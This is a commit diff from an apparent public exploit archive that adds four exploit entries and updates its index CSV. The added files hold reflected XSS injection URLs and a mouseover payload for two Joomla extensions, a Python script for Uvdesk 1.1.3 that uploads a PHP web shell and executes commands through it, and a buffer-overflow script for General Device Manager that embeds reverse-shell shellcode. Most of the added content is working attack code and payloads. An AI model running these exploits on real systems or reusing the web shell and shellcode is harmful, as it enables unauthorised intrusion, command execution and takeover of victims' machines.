DB: 2023-08-01

5 changes to exploits/shellcodes/ghdb Joomla iProperty Real Estate 4.1.1 - Reflected XSS Joomla Solidres 2.13.3 - Reflected XSS RosarioSIS 10.8.4 - CSV Injection Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated) WordPress Plugin AN_Gradebook 5.0.1 - SQLi General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
2023-08-01 00:16:36 +00:00 · 2023-08-01 00:16:36 +00:00 · 5eb89a2046
commit 5eb89a2046
parent c18d9953a2
5 changed files with 228 additions and 2 deletions
--- a/exploits/php/webapps/51638.txt
+++ b/exploits/php/webapps/51638.txt
@ -0,0 +1,56 @@
+# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 28/07/2023
+# Vendor: Solidres Team
+# Vendor Homepage: http://solidres.com/
+# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
+# Demo: http://demo.solidres.com/joomla
+# Version: 2.13.3
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+GET parameter 'show' is vulnerable to XSS
+GET parameter 'reviews' is vulnerable to XSS
+GET parameter 'type_id' is vulnerable to XSS
+GET parameter 'distance' is vulnerable to XSS
+GET parameter 'facilities' is vulnerable to XSS
+GET parameter 'categories' is vulnerable to XSS
+GET parameter 'prices' is vulnerable to XSS
+GET parameter 'location' is vulnerable to XSS
+GET parameter 'Itemid' is vulnerable to XSS
+
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]
+
+https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]
+
+https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14
+
+
+
+[-] Done
--- a/exploits/php/webapps/51639.py
+++ b/exploits/php/webapps/51639.py
@ -0,0 +1,54 @@
+# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
+# Date: 28/07/2023
+# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
+# Vendor Homepage: https://www.uvdesk.com
+# Software Link: https://github.com/uvdesk/community-skeleton
+# Version: 1.1.3
+# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
+# CVE : CVE-2023-39147
+# Tested on: Ubuntu 20.04.6
+
+
+import requests
+import argparse
+
+def get_args():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
+    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
+    my_args = parser.parse_args()
+    return my_args
+
+def main():
+    args = get_args()
+    base_url = args.url
+
+    command = args.command
+    uploaded_file = "shell.php"
+    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command
+
+# Edit your credentials here
+    login_data = {
+        "_username": "admin@adm.com",
+        "_password": "passwd",
+        "_remember_me": "off"
+    }
+
+    files = {
+        "name": (None, "pwn"),
+        "description": (None, "xxt"),
+        "visibility": (None, "public"),
+        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
+    }
+
+    s = requests.session()
+    # Login
+    s.post(base_url + "/en/member/login", data=login_data)
+    # Upload
+    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
+    # Execute command
+    cmd = s.get(url_cmd)
+    print(cmd.text)
+
+if __name__ == "__main__":
+    main()
--- a/exploits/php/webapps/51640.txt
+++ b/exploits/php/webapps/51640.txt
@ -0,0 +1,36 @@
+# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 29/07/2023
+# Vendor: The Thinkery LLC
+# Vendor Homepage: http://thethinkery.net
+# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
+# Demo: https://iproperty.thethinkery.net/
+# Version: 4.1.1
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /iproperty/property-views/all-properties-with-map
+
+GET parameter 'filter_keyword' is vulnerable to XSS
+
+https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1
+
+
+XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4
+
+
+[-] Done
--- a/exploits/windows/local/51641.py
+++ b/exploits/windows/local/51641.py
@ -0,0 +1,76 @@
+# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
+# Date: 30.07.2023
+# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
+# Software Link 2:
+https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
+# Exploit Author: Ahmet Ümit BAYRAM
+# Tested Version: 2.5.2.2
+# Tested on: Windows 10 64bit
+
+# 1.- Run python code : exploit.py
+# 2.- Open pwned.txt and copy all content to clipboard
+# 3.- Open Device Manage and press Add Device
+# 4.- Paste the content of pwned.txt into the 'IP Address'
+# 5.- Click 'OK'
+# 6.- nc.exe local IP Port 1337 and you will have a bind shell
+# 7.- R.I.P. Condor <3
+
+import struct
+
+offset = b"A" * 1308
+
+nseh = b"\xEB\x06\x90\x90" # jmp short
+
+seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
+
+
+nops = b"\x90" * 32
+
+#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
+
+shellcode =  b""
+shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
+shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
+shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
+shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
+shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
+shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
+shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
+shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
+shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
+shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
+shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
+shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
+shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
+shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
+shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
+shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
+shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
+shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
+shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
+shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
+shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
+shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
+shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
+shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
+shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
+shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
+shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
+shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
+shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
+shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
+shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
+shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
+
+
+final_payload = offset + nseh + seh + nops + shellcode
+
+# write the final payload to a file
+try:
+    with open('pwned.txt', 'wb') as f:
+        print("[+] Creating %s bytes evil payload..." %len(final_payload))
+        f.write(final_payload)
+        f.close()
+        print("[+] File created!")
+except:
+    print("File cannot be created!")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -20496,9 +20496,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15164,exploits/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",webapps,php,,2010-09-30,2015-07-12,0,OSVDB-68600,,,,,
 40530,exploits/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-13,0,,,,,,
 51629,exploits/php/webapps/51629.txt,"Joomla HikaShop 4.7.4 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
+51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
+51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 51631,exploits/php/webapps/51631.txt,"Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 31857,exploits/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,webapps,php,,2008-05-28,2014-02-24,1,,,,,,https://www.securityfocus.com/bid/29407/info
 31529,exploits/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,webapps,php,,2008-03-23,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28427/info
@ -28789,7 +28791,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5675,exploits/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",webapps,php,,2008-05-25,,1,OSVDB-53397;CVE-2008-6634,,,,,
 8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php,,2009-03-09,2016-12-02,1,,,,,http://www.exploit-db.comrp_1.6.zip,
 8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,,2009-05-25,2016-12-02,1,OSVDB-62791;CVE-2009-4671;OSVDB-54772;CVE-2009-4670;OSVDB-54771;CVE-2009-4669;OSVDB-54770;OSVDB-54769,,,,http://www.exploit-db.comrp_1.6.zip,
-51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-29918,,,,,
+51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-31,1,CVE-2023-29918,,,,,
 10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php,,2009-12-29,,1,OSVDB-61563;CVE-2009-4581,,,,,
 11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comRoseOnlineCMS_v3_b1.rar,
 3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php,,2007-03-22,2016-09-30,1,OSVDB-38601;CVE-2007-1636,,,,http://www.exploit-db.comRoseOnlineCMS_v3_B1.rar,
@ -31314,6 +31316,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,,
 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip,
 13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,,
+51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-07-31,0,CVE-2023-39147,,,,,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz,
 34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info
 27245,exploits/php/webapps/27245.txt,"V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,webapps,php,,2006-02-17,2013-07-31,1,CVE-2006-0792;OSVDB-23260,,,,,https://www.securityfocus.com/bid/16706/info
@ -32648,7 +32651,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40771,exploits/php/webapps/40771.txt,"WordPress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",webapps,php,,2016-11-17,2016-11-17,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-17-at-161058.png,http://www.exploit-db.comanswer-my-question.zip,
 46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC)",2019-03-28,"Ali S. Ahmad",webapps,php,80,2019-03-28,2019-07-05,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comgotmls.4.18.63.zip,
 50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php,,2021-07-06,2021-10-29,0,,,,,http://www.exploit-db.comgotmls.4.20.59.zip,
-51632,exploits/php/webapps/51632.py,"WordPress Plugin AN_Gradebook 5.0.1 - SQLi",2023-07-28,"Lukas Kinneberg",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-2636,,,,,
+51632,exploits/php/webapps/51632.py,"WordPress Plugin AN_Gradebook 5.0.1 - SQLi",2023-07-28,"Lukas Kinneberg",webapps,php,,2023-07-28,2023-07-31,1,CVE-2023-2636,,,,,
 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-9372;CVE-2020-9371,,,,http://www.exploit-db.comappointment-booking-calendar.zip,
 41568,exploits/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 41567,exploits/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
@ -40047,6 +40050,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51584,exploits/windows/local/51584.txt,"Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36166,,,,,
 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows,,2016-07-07,2016-07-07,0,,,,,,
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi,
+51641,exploits/windows/local/51641.py,"General Device Manager 2.5.2.2 - Buffer Overflow (SEH)",2023-07-31,"Ahmet Ümit BAYRAM",local,windows,,2023-07-31,2023-07-31,0,,,,,,
 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,